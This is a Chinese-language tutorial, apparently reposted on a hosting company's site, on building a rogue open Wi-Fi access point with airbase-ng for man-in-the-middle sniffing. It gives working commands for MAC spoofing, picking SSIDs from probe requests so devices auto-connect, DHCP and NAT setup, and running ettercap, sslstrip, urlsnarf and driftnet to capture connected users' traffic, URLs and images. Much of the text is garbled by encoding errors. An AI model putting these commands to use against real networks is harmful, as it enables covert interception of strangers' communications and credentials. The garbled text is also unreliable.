這篇文章主要介紹了airbase-ng如何建立SoftAP進行嗅探,具有一定借鑒價值,感興趣的朋友可以參考下,希望大家閱讀完這篇文章之后大有收獲,下面讓小編帶著大家一起了解一下。
利用airbase-ng建立Soft AP,再利用一些常見工具進行嗅探,或?qū)ψグM行分析是出現(xiàn)比較早的一種MITM***方法。網(wǎng)上有很多關于手動實現(xiàn)的文章,也有一些自動實現(xiàn)腳本。這些腳本通常分兩類,一類是一步一步讓用戶輸入接口、選項什么的,最后再運行,每一次啟動都要重復輸入很多數(shù)據(jù),低效且不爽。第二類是自動運行的,但可選項比較少,不符合自己的使用習慣。所以,在學習過程中自己寫了一個自動實現(xiàn)腳本。
建立Soft AP可使用airbase-ng和hostapd,其中前者需要網(wǎng)卡支持monitor模式,是比較常用的工具,但僅支持OPN和WEP的,不支持WPA加密,不挑網(wǎng)卡,常見的RTL8187L既可。第二個是hostapd,需要網(wǎng)卡支持AP模式,8187L就用不了了,rt3070可以使用,支持建立OPN/WEP/WPA各種SoftAP。本文介紹基于airbase-ng的實現(xiàn),畢竟這是個輕量級且各種hack可選項較多的常用工具。
建立soft Ap并進行嗅探,主要有如下4步:
1.airbase-ng建立熱點
2.dhcpd啟動dhcp服務
3.iptables設置好轉(zhuǎn)發(fā)規(guī)則,使接入Soft AP客戶的數(shù)據(jù)可正常訪問互聯(lián)網(wǎng)
4.啟動嗅探工具收集信息
結(jié)束后,還可以對抓取的包進行后續(xù)分析。當然,中間還可以進行DNS劫持,偽造頁面進行釣魚,不在本文討論范圍。下面分步說。
準備工作:
(1) 一臺電力比較持久的筆記本電腦,可以直接安裝kali linux,也可以在VMware中安裝kali。
(2)一塊8187L網(wǎng)卡,山寨的就可以,性價比高,做工沒看出來比原裝的差在哪兒,只要保證中間芯片是真的就行。(下面照片中是原裝的)
(3)天線:感覺7dbi的全向天線高度正好,再大就不方便了,而且9dbi的信號并未增強多少,反而損耗更大。方向性天線也不錯,7db方向性天線體積很小巧,據(jù)說明在聚焦方向上可達10dbi全向天線的作用距離,用于室內(nèi)空間較狹長時合適。穿墻能力就不說了,鋼筋混凝土墻兩堵,基本就很難接收可用信號了。
實測7dbi全向天線信號強度(無遮擋):65米處,-85dbm,50米處約-75dbm,10米之內(nèi)信號穩(wěn)定在-35dbm左右。該值非常粗略,僅供參考。一般能夠正常通信的下限是-90dbm,上網(wǎng)的話要求更高。當然,信號強度也和接收裝置的天線有關,不過總體上說,8187L加上7dbi的兩種天線基本夠用了,覆蓋一個公共場所不大室內(nèi)空間沒問題。
(4)筆記本有internet網(wǎng)接入,用于將Fake AP接收的信息轉(zhuǎn)到internet上去,不多贅述。
(5)啟動monitor模式,并偽造一下本機的網(wǎng)卡地址
airmon-ng start wlan1 ifconfig wlan1 down macchanger –r wlan1 ifconfig wlan1 up ifconfig mon0 down macchanger –r mon0 ifconfig mon0 up
一、使用airbase-ng建立OPN的Soft AP
airbase-ng主要用于建立OPN的AP,也就是不需要密碼的公開AP。WEP加密的已經(jīng)很少見了,不支持WPA加密。這一步中,最關鍵的是AP的ssid,ssid決定了AP欺騙性,也就是被連接的可能性?,F(xiàn)在手機、平板電腦的客戶端會自動記錄連接過的AP信息,保存在/data/misc/wifi/wpa_suppliant.conf中,每個熱點保存四個信息:ssid、psk(密碼)、key_mgmt(加密方式)、priority(優(yōu)先級)。注意,其中不含網(wǎng)卡的硬件地址.所以,只需前三項對上,便可自動連接。
手機wifi功能打開時,會不斷向外發(fā)送probe信息包,里面包含ssid??捎胊irodump-ng查看當前網(wǎng)絡環(huán)境下有哪些被probe的ssid,供偽造ssid時參考。
選定名稱后,便可使用airbase-ng建立Fake AP了:
airbase-ng $FAKE_AP_INTERFACE -e $FAKE_AP_ESSID -c
airbase-ng運行成功后,ifconfig查看,會多出一個at0接口。
root@mKL:~# ifconfig at0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx inet addr:10.0.0.1 Bcast:10.0.0.255 Mask:255.255.255.0 … eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx inet addr:10.10.10.138 Bcast:10.10.10.255 Mask:255.255.255.0 …
二、使用dhcpd啟動dhcp服務
客戶端連接上SoftAP后,要給他們分配IP地址。這里有一條最關鍵,就是SoftAP的IP地址和Internet接口的IP地址不能在網(wǎng)一個段。比如,連接Internet網(wǎng)的網(wǎng)卡eth0,地址是10.10.10.138/24,則at0的地址后面不能設置為同一網(wǎng)段,這里設置為10.0.0.1/24。
首先建立dhcpd.conf,內(nèi)容包含dhcp服務運行的設置參數(shù),關鍵代碼如下:
echo -n "[+]now creating dhcpd.conf..." cat >$SESSION_PATH/dhcpd.conf<<-EOF authoritative; default-lease-time 6000; max-lease-time 12000; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.30 10.0.0.60; option routers 10.0.0.1; option broadcast-address 10.0.0.255; option subnet-mask 255.255.255.0; option domain-name-servers 8.8.8.8; allow unknown-clients; } EOF echo "done"
這些選項的意義就不一一介紹了,比較重要的時option routers,網(wǎng)關的設置,后續(xù)at0的地址要設置為該網(wǎng)關地址。option domain-name-servers,設置DNS服務器地址,8.8.8.8是比較通用的值。
接下來然后需要將SoftAP的接口,也就是airbase-ng創(chuàng)建的at0設置為該網(wǎng)段的網(wǎng)關:
ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1500 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
接著啟動dhcp服務
dhcpd -d -f -cf $SESSION_PATH/dhcpd.conf at0
三、使用iptables設置轉(zhuǎn)發(fā)
使用iptables設置轉(zhuǎn)發(fā),將用戶連接SoftAP后的數(shù)據(jù),轉(zhuǎn)發(fā)到internet上,是非常關鍵的一步。網(wǎng)上各種版本很多,其實最簡單的實現(xiàn)就一句指令:
iptables -t nat -A POSTROUTING --out-interface $FAKE_AP_INTERNET -j MASQUERADE #$FAKE_AP_INTERNET是外網(wǎng)接口
注意,轉(zhuǎn)發(fā)生效需要本機開啟ip_forward功能。指令是:
echo "1" > /proc/sys/net/ipv4/ip_forward
由于后面運行ettercap時,會將該值再次變?yōu)?,所以等ettercap運行后再執(zhí)行上述命令。
四、運行各種嗅探工具
SoftAP建立并運行dhcp服務后,客戶端就可以根據(jù)我們設定的規(guī)則連接上熱點并正常瀏覽網(wǎng)頁,運行各個程序了。接下來,就是針對Soft AP的接口at0,執(zhí)行各種嗅探:
ettercap -Tzq -i $FAKE_AP_AT_INTERFACE -w $SESSION_PATH/etter.pcap -L $SESSION_PATH/etter iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $SSLSTRIP_PORT sslstrip -pkf -l $SSLSTRIP_PORT -w $SESSION_PATH/sslstrip.log 2>/dev/null urlsnarf -i $1 | grep http > $SESSION_PATH/url.txt tail -f $SESSION_PATH/url.txt driftnet -i $1 -d $SESSION_PATH/
以上就是實現(xiàn)基于Soft AP的MITM***的幾個關鍵步驟。
這里提供一個自動執(zhí)行腳本auto_opnAP.sh,最簡單的執(zhí)行命令是:
auto_opnAP.sh -e xxxx -sud -i mon0 -n eth0
運行界面如下圖所示:
感謝你能夠認真閱讀完這篇文章,希望小編分享的“airbase-ng如何建立SoftAP進行嗅探”這篇文章對大家有幫助,同時也希望大家多多支持創(chuàng)新互聯(lián),關注創(chuàng)新互聯(lián)行業(yè)資訊頻道,更多相關知識等著你來學習!
另外有需要云服務器可以了解下創(chuàng)新互聯(lián)scvps.cn,海內(nèi)外云服務器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應用場景需求。
網(wǎng)站欄目:airbase-ng如何建立SoftAP進行嗅探-創(chuàng)新互聯(lián)
鏈接地址:http://aaarwkj.com/article4/gepie.html
成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供App開發(fā)、手機網(wǎng)站建設、網(wǎng)站營銷、外貿(mào)建站、企業(yè)建站、定制網(wǎng)站
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容